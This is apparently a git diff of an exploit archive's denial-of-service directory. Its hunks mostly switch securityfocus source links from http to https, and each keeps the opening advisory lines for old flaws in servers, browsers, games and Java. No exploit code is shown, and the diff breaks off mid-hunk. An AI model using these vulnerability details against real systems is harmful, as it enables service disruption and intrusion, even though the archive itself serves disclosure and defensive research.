b/exploits/multiple/dos/22926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8224/info +source: https://www.securityfocus.com/bid/8224/info Witango Server is prone to a remote buffer overflow vulnerability. Remote users may be able to send an HTTP request to a Witango server with a cookie containing a specific variable set to an excessively large value. Remote code execution is possible. diff --git a/exploits/multiple/dos/22987.pl b/exploits/multiple/dos/22987.pl index 0b569ea73..3b52dc61d 100755 --- a/exploits/multiple/dos/22987.pl +++ b/exploits/multiple/dos/22987.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8343/info +source: https://www.securityfocus.com/bid/8343/info EveryBuddy is prone to a denial of service vulnerability when handling instant messages of excessive length. This could be exploited with a malicious instant messaging client. diff --git a/exploits/multiple/dos/23050.txt b/exploits/multiple/dos/23050.txt index 5e77134ad..d670f5bcc 100644 --- a/exploits/multiple/dos/23050.txt +++ b/exploits/multiple/dos/23050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8471/info +source: https://www.securityfocus.com/bid/8471/info It has been reported that a buffer overflow condition exists in the Avant Browser software that may cause an attacker to run arbitrary code on a vulnerable host in order to gain unauthorized access to the system. The vulnerability is due to a lack of boundary condition checks on URL values. diff --git a/exploits/multiple/dos/23051.txt b/exploits/multiple/dos/23051.txt index 5a0057e91..8cfbfbdf6 100644 --- a/exploits/multiple/dos/23051.txt +++ b/exploits/multiple/dos/23051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8472/info +source: https://www.securityfocus.com/bid/8472/info WapServ has been reported prone to multiple remote denial of service vulnerabilities. diff --git a/exploits/multiple/dos/23142.txt b/exploits/multiple/dos/23142.txt index adc0a228e..0975c7027 100644 --- a/exploits/multiple/dos/23142.txt +++ b/exploits/multiple/dos/23142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8617/info +source: https://www.securityfocus.com/bid/8617/info WideChapter has been reported prone to a buffer overflow vulnerability when handling HTTP requests of excessive length. diff --git a/exploits/multiple/dos/23181.txt b/exploits/multiple/dos/23181.txt index 65a9b3333..18ee3f8cc 100644 --- a/exploits/multiple/dos/23181.txt +++ b/exploits/multiple/dos/23181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8697/info +source: https://www.securityfocus.com/bid/8697/info Null HTTPd has been reported prone to a remotely triggered denial of service vulnerability. diff --git a/exploits/multiple/dos/23231.txt b/exploits/multiple/dos/23231.txt index fcada934d..a5bf17b02 100644 --- a/exploits/multiple/dos/23231.txt +++ b/exploits/multiple/dos/23231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8787/info +source: https://www.securityfocus.com/bid/8787/info It has been reported that Medieval Total War may be prone to a denial of service vulnerability. The issue is caused when an attacker sends a malformed value for nickname consisting of 0 Unicode characters to the server during the initial authentication process. The exploitation of this issue results in the all users receiving a "Connection expired" message before leading to a crash of the server. diff --git a/exploits/multiple/dos/23263.txt b/exploits/multiple/dos/23263.txt index f41a5a453..71c031b9f 100644 --- a/exploits/multiple/dos/23263.txt +++ b/exploits/multiple/dos/23263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8853/info +source: https://www.securityfocus.com/bid/8853/info A vulnerability has been discovered in the Opera web browser that could lead to remote code execution. The problem is said to trigger when handling malformed HTML HREF values and may result in a buffer overrun occuring within heap memory. As a result of this issue, an attacker may be capable of executing arbitrary code on a victim user by coaxing them to a malicious web site, or possibly by transmitting a malicious HTML e-mail message to an Opera mail client. diff --git a/exploits/multiple/dos/23276.java b/exploits/multiple/dos/23276.java index 85a19c88e..492fa35d7 100644 --- a/exploits/multiple/dos/23276.java +++ b/exploits/multiple/dos/23276.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8879/info +source: https://www.securityfocus.com/bid/8879/info A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts. diff --git a/exploits/multiple/dos/23292.java b/exploits/multiple/dos/23292.java index d0ca5b068..ae1765875 100644 --- a/exploits/multiple/dos/23292.java +++ b/exploits/multiple/dos/23292.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8892/info +source: https://www.securityfocus.com/bid/8892/info A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine. diff --git a/exploits/multiple/dos/23314.c b/exploits/multiple/dos/23314.c index a61c031db..1d8679b25 100644 --- a/exploits/multiple/dos/23314.c +++ b/exploits/multiple/dos/23314.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8936/info +// source: https://www.securityfocus.com/bid/8936/info It has been reported that Serious Sam game engine is vulnerable to a remote denial of service vulnerability due to a failure to handle exceptional conditions. This issue occurs when the client sends a certain malformed parameter to the server. This request may cause the software to consume an excessive amount of CPU cycles leading to a crash or hang. diff --git a/exploits/multiple/dos/23325.c b/exploits/multiple/dos/23325.c index 9e31fc73a..13bfda44f 100644 --- a/exploits/multiple/dos/23325.c +++ b/exploits/multiple/dos/23325.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8947/info +// source: https://www.securityfocus.com/bid/8947/info It has been reported that BRS WebWeaver may be prone to a denial of service issue that may allow a remote attacker to cause the software to crash or hang. The issue presents itself when the server receives a request containing a large string value for the `User-Agent` parameter. diff --git a/exploits/multiple/dos/23390.txt b/exploits/multiple/dos/23390.txt index 5cd17e474..8326d2805 100644 --- a/exploits/multiple/dos/23390.txt +++ b/exploits/multiple/dos/23390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9077/info +source: https://www.securityfocus.com/bid/9077/info A problem has been reported the service used by EffectOffice Server. Because of this, it may be possible for a remote user to deny service to legitimate users of the software. diff --git a/exploits/multiple/dos/23431.pl b/exploits/multiple/dos/23431.pl index e716b5d85..f942d6f5c 100755 --- a/exploits/multiple/dos/23431.pl +++ b/exploits/multiple/dos/23431.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9198/info +source: https://www.securityfocus.com/bid/9198/info It has been reported that sipd may be prone to a vulnerability that may allow a remote attacker to cause a denial of service condition in the software. The problem is reported to exist in the gethostbyname_r function. An attacker may be able to cause the server to crash by sending a malformed SIP request. diff --git a/exploits/multiple/dos/23444.pl b/exploits/multiple/dos/23444.pl index 4960d4cb1..c1de6dbc4 100755 --- a/exploits/multiple/dos/23444.pl +++ b/exploits/multiple/dos/23444.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9236/info +source: https://www.securityfocus.com/bid/9236/info sipd has been reported prone to a format string vulnerability that may be triggered remotely. It has been reported that sip URI arguments passed to the affected server are not sufficiently handled. An attacker may place format specifiers in the URI and they will be handled literally, potentially allowing the attacker to read from and write to arbitrary memory. diff --git a/exploits/multiple/dos/23543.txt b/exploits/multiple/dos/23543.txt index 60b962b0f..b179a6053 100644 --- a/exploits/multiple/dos/23543.txt +++ b/exploits/multiple/dos/23543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9427/info +source: https://www.securityfocus.com/bid/9427/info It has been reported that RapidCache server may be prone to a denial of service vulnerability that may allow an attacker to cause the server to crash or hang. The issue presents itself when an attacker sends an excessively large string value to the server via the 'Host' argument through an HTTP GET request. diff --git a/exploits/multiple/dos/23556.txt b/exploits/multiple/dos/23556.txt index 31174cd35..f5df318c2 100644 --- a/exploits/multiple/dos/23556.txt +++ b/exploits/multiple/dos/23556.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9451/info +source: https://www.securityfocus.com/bid/9451/info The GetWare Web Server component has been reported prone to a remote denial of service vulnerability. It has been reported that the issue will present itself when the affected web server receives malicious HTTP requests that contain negative values for the Content-Length field in the HTTP header. diff --git a/exploits/multiple/dos/23590.txt b/exploits/multiple/dos/23590.txt index 49292406d..ac5d2288e 100644 --- a/exploits/multiple/dos/23590.txt +++ b/exploits/multiple/dos/23590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9482/info +source: https://www.securityfocus.com/bid/9482/info Reptile has been reported prone to a remote denial of service vulnerability. It has been reported that this issue exists because the affected server does not time out on incomplete requests. A remote attacker may exploit this vulnerability to deny service to legitimate users. diff --git a/exploits/multiple/dos/23641.txt b/exploits/multiple/dos/23641.txt index e2a131491..98427bcce 100644 --- a/exploits/multiple/dos/23641.txt +++ b/exploits/multiple/dos/23641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9567/info +source: https://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. diff --git a/exploits/multiple/dos/23642.txt b/exploits/multiple/dos/23642.txt index 597a87ef7..fc2c7897c 100644 --- a/exploits/multiple/dos/23642.txt +++ b/exploits/multiple/dos/23642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9567/info +source: https://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. diff --git a/exploits/multiple/dos/23656.txt b/exploits/multiple/dos/23656.txt index 8f2f73720..c3956a484 100644 --- a/exploits/multiple/dos/23656.txt +++ b/exploits/multiple/dos/23656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9587/info +source: https://www.securityfocus.com/bid/9587/info Oracle database has been reported prone to multiple buffer overflow vulnerabilities when processing certain parameters and functions. Specifically the TIME_ZONE parameter, NUMTOYMINTERVAL, NUMTODSINTERVAL and FROM_TZ functions. Excessive data passed to any of the aforementioned parameters/statements may potentially overrun the bounds of a buffer in stack-based memory. This may result in the corruption of memory adjacent to the affected buffer, and ultimately may provide for arbitrary code execution. diff --git a/exploits/multiple/dos/23755.txt b/exploits/multiple/dos/23755.txt index 48605a627..adc78d417 100644 --- a/exploits/multiple/dos/23755.txt +++ b/exploits/multiple/dos/23755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9738/info +source: https://www.securityfocus.com/bid/9738/info The Ghost Recon Game Engine has been reported prone to a denial of service vulnerability. When handling text strings, the Ghost Recon Game Engine employs a 32-bit integer string size prefix in order to monitor the size of the string. It has been reported that when an invalid size value is supplied an exception will be triggered causing a system wide denial of service. diff --git a/exploits/multiple/dos/23787.txt b/exploits/multiple/dos/23787.txt index ed4cfddd3..fa05f8682 100644 --- a/exploits/multiple/dos/23787.txt +++ b/exploits/multiple/dos/23787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9794/info +source: https://www.securityfocus.com/bid/9794/info 1st Class Mail Server has been reported prone to a remote buffer overflow vulnerability. The issue exists due to a lack of sufficient boundary checks performed on user-supplied data. diff --git a/exploits/multiple/dos/23799.txt b/exploits/multiple/dos/23799.txt index 148a1985e..d02a94b0c 100644 --- a/exploits/multiple/dos/23799.txt +++ b/exploits/multiple/dos/23799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9840/info +source: https://www.securityfocus.com/bid/9840/info A format string vulnerability has been reported to exists in the Unreal Tournament server engine. This issue is due to a failure of the server application to properly sanitize user supplied network data. diff --git a/exploits/multiple/dos/23805.txt b/exploits/multiple/dos/23805.txt index 98e5577b4..1d0274641 100644 --- a/exploits/multiple/dos/23805.txt +++ b/exploits/multiple/dos/23805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9849/info +source: https://www.securityfocus.com/bid/9849/info The Battle Mages game server has been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when the server receives incomplete client data. Specifically the affected server will attempt to read the expected data size infinitely until it is received, this may allow a remote attacker to tie up server resources and effectively deny service to legitimate users. diff --git a/exploits/multiple/dos/23902.txt b/exploits/multiple/dos/23902.txt index 211b3215a..3a3789f86 100644 --- a/exploits/multiple/dos/23902.txt +++ b/exploits/multiple/dos/23902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10022/info +source: https://www.securityfocus.com/bid/10022/info Roger Wilco Server has been reported prone to a remote denial of service vulnerability. The issue is reported to exist due to a flaw when handling malicious UDP payloads that are destined for the vulnerable server. diff --git a/exploits/multiple/dos/23904.txt b/exploits/multiple/dos/23904.txt index 6b47590b6..5002a938d 100644 --- a/exploits/multiple/dos/23904.txt +++ b/exploits/multiple/dos/23904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10025/info +source: https://www.securityfocus.com/bid/10025/info A vulnerability has been reported in the Roger Wilco Server, it is reported that a user does not need to connect to the server over the TCP port to have UDP based audio streams handled. Rather the attacker will require knowledge of user ID's connected to a target channel. Because the user ID's for a channel exist in a range of 0-127, the attacker may transmit an audio stream to an affected server that will be heard by all connected users, however the server administrator will have no control over disconnecting or muting this audio stream. diff --git a/exploits/multiple/dos/24011.pl b/exploits/multiple/dos/24011.pl index 852734143..5ee9f7cf5 100755 --- a/exploits/multiple/dos/24011.pl +++ b/exploits/multiple/dos/24011.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10159/info +source: https://www.securityfocus.com/bid/10159/info A denial of service vulnerability has been reported in KPhone. This issue may be triggered by a malformed SIP (Session Initiation Protocol) STUN message. This is due to insufficient validation of user-specified STUN packet attribute lengths, causing an out of bounds read and subsequent crash. diff --git a/exploits/multiple/dos/24013.txt b/exploits/multiple/dos/24013.txt index dd5040249..39b578cad 100644 --- a/exploits/multiple/dos/24013.txt +++ b/exploits/multiple/dos/24013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10163/info +source: https://www.securityfocus.com/bid/10163/info A denial of service vulnerability has been reported in Macromedia ColdFusion MX that is reported to occur when the software attempts to write oversized error messages. These error messages will be logged by the server but may also be written into dynamically generated error pages. diff --git a/exploits/multiple/dos/24066.txt b/exploits/multiple/dos/24066.txt index 421188d2d..5d50990d3 100644 --- a/exploits/multiple/dos/24066.txt +++ b/exploits/multiple/dos/24066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10228/info +source: https://www.securityfocus.com/bid/10228/info The DiGi WWW Server has been reported to contain a remote denial of service vulnerability. It has been reported that when the server receives a malformed HTTP GET request, the web server process will consume large amounts of CPU resources. diff --git a/exploits/multiple/dos/24070.txt b/exploits/multiple/dos/24070.txt index ac6769310..ff3b94a43 100644 --- a/exploits/multiple/dos/24070.txt +++ b/exploits/multiple/dos/24070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10249/info +source: https://www.securityfocus.com/bid/10249/info It has been reported that Sphiro HTTPD is prone to a remote heap based buffer overflow vulnerability. This issue is due to a failure of the application to properly verify buffer boundaries before storing input in fixed buffers. diff --git a/exploits/multiple/dos/24130.txt b/exploits/multiple/dos/24130.txt index 29b2867c7..59c9aed61 100644 --- a/exploits/multiple/dos/24130.txt +++ b/exploits/multiple/dos/24130.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10380/info +source: https://www.securityfocus.com/bid/10380/info ActiveState Perl is reported to be prone to an integer overflow vulnerability. It is revealed through testing that other implementations are also vulnerable. diff --git a/exploits/multiple/dos/24170.txt b/exploits/multiple/dos/24170.txt index 053b22f14..c2d3601d9 100644 --- a/exploits/multiple/dos/24170.txt +++ b/exploits/multiple/dos/24170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10464/info +source: https://www.securityfocus.com/bid/10464/info It is reported that Colin McRae Rally 2004 has a flaw handling server responses when entering the multiplayer menu of the game. diff --git a/exploits/multiple/dos/24242.java b/exploits/multiple/dos/24242.java index e62833b9a..c19c32fd7 100644 --- a/exploits/multiple/dos/24242.java +++ b/exploits/multiple/dos/24242.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10623/info +source: https://www.securityfocus.com/bid/10623/info The Sun Java Runtime Environment Font object is reportedly vulnerable to an assertion failure denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when processing font objects. diff --git a/exploits/multiple/dos/24247.txt b/exploits/multiple/dos/24247.txt index 9f18d0cf2..78de35364 100644 --- a/exploits/multiple/dos/24247.txt +++ b/exploits/multiple/dos/24247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10649/info +source: https://www.securityfocus.com/bid/10649/info It is reported that Easy Chat Server is susceptible to multiple denial of service vulnerabilities. diff --git a/exploits/multiple/dos/24282.txt b/exploits/multiple/dos/24282.txt index 44c1da2a5..17581680d 100644 --- a/exploits/multiple/dos/24282.txt +++ b/exploits/multiple/dos/24282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10728/info +source: https://www.securityfocus.com/bid/10728/info It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities. diff --git a/exploits/multiple/dos/24283.txt b/exploits/multiple/dos/24283.txt index 812acdebd..a7c2afd36 100644 --- a/exploits/multiple/dos/24283.txt +++ b/exploits/multiple/dos/24283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10728/info +source: https://www.securityfocus.com/bid/10728/info It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities. diff --git a/exploits/multiple/dos/24305.txt b/exploits/multiple/dos/24305.txt index 690a6fcc2..9098aba14 100644 --- a/exploits/multiple/dos/24305.txt +++ b/exploits/multiple/dos/24305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10782/info +source: https://www.securityfocus.com/bid/10782/info It is reported that VPOP3 is reported prone to a remote denial of service vulnerability. This issue presents itself when an attacker issues a URI request containing a large value for the 'msglistlen' parameter to the web mail interface. diff --git a/exploits/multiple/dos/24351.c b/exploits/multiple/dos/24351.c index f924ae784..cd0dba512 100644 --- a/exploits/multiple/dos/24351.c +++ b/exploits/multiple/dos/24351.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10863/info +// source: https://www.securityfocus.com/bid/10863/info Free Web Chat server is reported prone to multiple denial of service vulnerabilities. The following issues are reported: diff --git a/exploits/multiple/dos/24352.java b/exploits/multiple/dos/24352.java index ee8506924..27e0ac5b8 100644 --- a/exploits/multiple/dos/24352.java +++ b/exploits/multiple/dos/24352.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10863/info +source: https://www.securityfocus.com/bid/10863/info Free Web Chat server is reported prone to multiple denial of service vulnerabilities. The following issues are reported: diff --git a/exploits/multiple/dos/24386.txt b/exploits/multiple/dos/24386.txt index ca9d670ec..342b3c331 100644 --- a/exploits/multiple/dos/24386.txt +++ b/exploits/multiple/dos/24386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10984/info +source: https://www.securityfocus.com/bid/10984/info sarad is reported prone to a buffer overflow vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/multiple/dos/24388.txt b/exploits/multiple/dos/24388.txt index f3c161139..b8f40cf28 100644 --- a/exploits/multiple/dos/24388.txt +++ b/exploits/multiple/dos/24388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10989/info +source: https://www.securityfocus.com/bid/10989/info aGSM is reported prone to a remote buffer overflow vulnerability. The issue presents itself in the aGSM server information parsing routines for Half-Life game servers. Due to a lack of sufficient bounds checking performed on the hostname parameter in a server reply to an info request, a malicious server may execute arbitrary code on an affected client. diff --git a/exploits/multiple/dos/24394.txt b/exploits/multiple/dos/24394.txt index c4d5c81a7..641263942 100644 --- a/exploits/multiple/dos/24394.txt +++ b/exploits/multiple/dos/24394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10997/info +source: https://www.securityfocus.com/bid/10997/info Opera Web Browser is reported prone to a JavaScript denial-of-service vulnerability. diff --git a/exploits/multiple/dos/24423.txt b/exploits/multiple/dos/24423.txt index f92dcd12b..287ac39ec 100644 --- a/exploits/multiple/dos/24423.txt +++ b/exploits/multiple/dos/24423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11085/info +source: https://www.securityfocus.com/bid/11085/info Cerbère Proxy server is reported prone to a remote denial of service vulnerability. This issue presents itself when a remote attacker sends a malformed HTTP GET request to the server. diff --git a/exploits/multiple/dos/24592.txt b/exploits/multiple/dos/24592.txt index 4ab837917..c55901e47 100644 --- a/exploits/multiple/dos/24592.txt +++ b/exploits/multiple/dos/24592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11161/info +source: https://www.securityfocus.com/bid/11161/info Pingtel Xpressa handsets are reported prone to a remote denial of service vulnerability. The issue is reported to exist because of a lack of sufficient boundary checks performed on HTTP request data handled by the Xpressa administration web server. diff --git a/exploits/multiple/dos/24597.txt b/exploits/multiple/dos/24597.txt index 4685db27b..2c5ab4f0a 100644 --- a/exploits/multiple/dos/24597.txt +++ b/exploits/multiple/dos/24597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11169/info +source: https://www.securityfocus.com/bid/11169/info Mozilla is prone to a remotely exploitable heap overflow that is exposed when the browser handles non-ASCII characters in URIs. diff --git a/exploits/multiple/dos/24610.txt b/exploits/multiple/dos/24610.txt index 0b16cc86a..adf291b57 100644 --- a/exploits/multiple/dos/24610.txt +++ b/exploits/multiple/dos/24610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11213/info +source: https://www.securityfocus.com/bid/11213/info DNS4Me is reported to be susceptible to a denial of service vulnerability, and a cross-site scripting vulnerability. These vulnerabilities affect the built-in web server contained in the package. diff --git a/exploits/multiple/dos/24668.txt b/exploits/multiple/dos/24668.txt index ec86c4027..0effdb3f3 100644 --- a/exploits/multiple/dos/24668.txt +++ b/exploits/multiple/dos/24668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11351/info +source: https://www.securityfocus.com/bid/11351/info Flash Messaging server is reported prone to a remote denial of service vulnerability. This issue arises due to the inability of the server to handle exceptional conditions properly. A remote attacker may cause a vulnerable server to crash, denying service to legitimate users. diff --git a/exploits/multiple/dos/24691.txt b/exploits/multiple/dos/24691.txt index 0c82dd92a..3670287f8 100644 --- a/exploits/multiple/dos/24691.txt +++ b/exploits/multiple/dos/24691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11462/info +source: https://www.securityfocus.com/bid/11462/info Vypress Tonecast is reported prone to a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/24710.txt b/exploits/multiple/dos/24710.txt index b6cf935b3..48a30795f 100644 --- a/exploits/multiple/dos/24710.txt +++ b/exploits/multiple/dos/24710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11551/info +source: https://www.securityfocus.com/bid/11551/info Multiple remote vulnerabilities have been reported to affect Quake II. These issues are due to boundary condition checking failures, access validation failures and failures to handle exceptional conditions. diff --git a/exploits/multiple/dos/24715.txt b/exploits/multiple/dos/24715.txt index 5f05d5fd4..c51459daa 100644 --- a/exploits/multiple/dos/24715.txt +++ b/exploits/multiple/dos/24715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11567/info +source: https://www.securityfocus.com/bid/11567/info Caudium is reported prone to a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/24761.txt b/exploits/multiple/dos/24761.txt index c5770608e..3f1bceeda 100644 --- a/exploits/multiple/dos/24761.txt +++ b/exploits/multiple/dos/24761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11724/info +source: https://www.securityfocus.com/bid/11724/info The Halo game client is reported prone to a remote denial of service vulnerability. It is reported that when using the in game browser to view a server list, a malicious reply from a server may crash the affected client. diff --git a/exploits/multiple/dos/24763.txt b/exploits/multiple/dos/24763.txt index 86ce37c7b..020990f87 100644 --- a/exploits/multiple/dos/24763.txt +++ b/exploits/multiple/dos/24763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11726/info +source: https://www.securityfocus.com/bid/11726/info A vulnerability is reported to exist in the access controls of the Java to JavaScript data exchange within web browsers that employ the Sun Java Plug-in. Reports indicate that it is possible for a malicious website that contains JavaScript code to exploit this vulnerability to load a dangerous Java class and to pass this class to an invoked applet. diff --git a/exploits/multiple/dos/24778.html b/exploits/multiple/dos/24778.html index 0629863b8..10d23b8fd 100644 --- a/exploits/multiple/dos/24778.html +++ b/exploits/multiple/dos/24778.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11757/info +source: https://www.securityfocus.com/bid/11757/info Java provides support for dynamic and static versioning when loading applets in the Java plug-in. This means that during the invocation of an applet, a user can request that a particular version of a plug-in be used to run the applet. The feature is accessible through various HTML tags that allow Java applets to be embedded in HTML documents, such as the EMBED, OBJECT, and APPLET tags. @@ -13,11 +13,11 @@ Note that since this feature is supported in various browsers, the browsers them Demonstration uses the following vulnerability:
-http://www.securityfocus.com/bid/8879 +https://www.securityfocus.com/bid/8879
Source code for Simple.class:
-http://www.securityfocus.com/bid/8879/exploit/ +https://www.securityfocus.com/bid/8879/exploit/

Added this code to Simple.java for debugging purposes:
diff --git a/exploits/multiple/dos/24781.html b/exploits/multiple/dos/24781.html index dfcac37ce..3d4051081 100644 --- a/exploits/multiple/dos/24781.html +++ b/exploits/multiple/dos/24781.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11761/info +source: https://www.securityfocus.com/bid/11761/info Mozilla Camino Web browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed. diff --git a/exploits/multiple/dos/24793.txt b/exploits/multiple/dos/24793.txt index d707aebd9..6e411f3e1 100644 --- a/exploits/multiple/dos/24793.txt +++ b/exploits/multiple/dos/24793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11780/info +source: https://www.securityfocus.com/bid/11780/info JanaServer 2 is a commercially available proxy server designed for the Microsoft Windows platform. It contains support for services such as HTTP, FTP, email, and RealPlayer streaming. diff --git a/exploits/multiple/dos/24799.txt b/exploits/multiple/dos/24799.txt index 90b1fc7ad..d513b17d3 100644 --- a/exploits/multiple/dos/24799.txt +++ b/exploits/multiple/dos/24799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11823/info +source: https://www.securityfocus.com/bid/11823/info Mozilla/Netscape and Firefox browsers are reported prone a remote denial of service vulnerability. It is reported that the affected browsers will crash as a result of a NULL pointer dereference when a JavaScript function attempts to print an IFRAME that is embedded in the page. diff --git a/exploits/multiple/dos/24805.txt b/exploits/multiple/dos/24805.txt index 953267e19..e84a75d15 100644 --- a/exploits/multiple/dos/24805.txt +++ b/exploits/multiple/dos/24805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11843/info +source: https://www.securityfocus.com/bid/11843/info A remote denial of service vulnerability has been reported to affect the MySQL MaxDB WAHTTP server. This issue is due to a failure of the server to handle malformed requests. diff --git a/exploits/multiple/dos/24807.txt b/exploits/multiple/dos/24807.txt index 4bc449a24..dac2bc62a 100644 --- a/exploits/multiple/dos/24807.txt +++ b/exploits/multiple/dos/24807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11849/info +source: https://www.securityfocus.com/bid/11849/info The MD5 algorithm is reported prone to a hash collision weakness. This weakness reportedly allows attackers to create multiple, differing input sources that, when the MD5 algorithm is used, result in the same output fingerprint. diff --git a/exploits/multiple/dos/24809.txt b/exploits/multiple/dos/24809.txt index fe3f26751..adfc60143 100644 --- a/exploits/multiple/dos/24809.txt +++ b/exploits/multiple/dos/24809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11859/info +source: https://www.securityfocus.com/bid/11859/info It is reported that the Kerio Personal Firewall (KPF) driver does not sufficiently sanitize API parameters that are received from API's that are hooked by KPF. When the KPF API hook handles certain parameter data it will fail. Reports indicate that this exception is not expected and as a result, the Windows kernel crashes triggering a system wide denial of service. diff --git a/exploits/multiple/dos/24818.txt b/exploits/multiple/dos/24818.txt index 814fc38f9..b4074bb80 100644 --- a/exploits/multiple/dos/24818.txt +++ b/exploits/multiple/dos/24818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11887/info +source: https://www.securityfocus.com/bid/11887/info A remote denial of service vulnerability reportedly affects Digital Illusions CE Codename Eagle. This issue is due to a failure of the application to properly handle exceptional network data. diff --git a/exploits/multiple/dos/25056.html b/exploits/multiple/dos/25056.html index e2c50086f..0ade4b318 100644 --- a/exploits/multiple/dos/25056.html +++ b/exploits/multiple/dos/25056.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12331/info +source: https://www.securityfocus.com/bid/12331/info Netscape Navigator is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed. diff --git a/exploits/multiple/dos/25075.pl b/exploits/multiple/dos/25075.pl index 4d883b818..dbaf96f86 100755 --- a/exploits/multiple/dos/25075.pl +++ b/exploits/multiple/dos/25075.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12416/info +source: https://www.securityfocus.com/bid/12416/info Eternal Lines Web Server is reported prone to a remote denial of service vulnerability. It is reported that the issue presents itself when the web service handles 70 or more simultaneous connections from a remote host. diff --git a/exploits/multiple/dos/25081.txt b/exploits/multiple/dos/25081.txt index f42ae7570..82c719230 100644 --- a/exploits/multiple/dos/25081.txt +++ 